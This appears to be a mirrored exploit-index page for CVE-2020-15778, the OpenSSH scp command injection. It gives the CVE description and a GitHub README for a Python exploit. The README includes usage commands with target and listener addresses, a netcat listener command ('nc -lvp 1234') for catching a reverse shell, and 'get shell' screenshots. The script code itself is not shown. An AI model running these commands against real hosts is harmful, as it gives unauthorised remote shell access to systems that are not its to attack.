CVE-2020-15778 PoC — OpenSSH 操作系统命令注入漏洞

Source

https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit

Associated Vulnerability

Title:OpenSSH 操作系统命令注入漏洞 (CVE-2020-15778)
Description:scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."

Description

Exploit for CVE-2020-15778(OpenSSH vul)

Readme

# CVE-2020-15778-Exploit
## Exploit for CVE-2020-15778(OpenSSH vul)  
Example: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
You need to use netcat to listen port before use python script  
Example: nc -lvp 1234  
1.Screenshot of using script  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/1.PNG)  
2.Screenshot of get shell  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/2.PNG)  
  
 2021-7-21 Update Log:  
 Use python-nmap to check host status  
 Usage:python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
 "pip3 install python-nmap" before you use Update version script  
 XD

File Snapshot


 [4.0K]  /data/pocs/9f77b4717f9d9917ba826ad9aa8af63b4514c8fb
├── [1.6K]  CVE-2020-15778.py
├── [2.0K]  CVE-2020-15778-Update.py
├── [4.0K]  img
│   ├── [ 62K]  1.PNG
│   └── [ 15K]  2.PNG
└── [ 725]  README.md

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!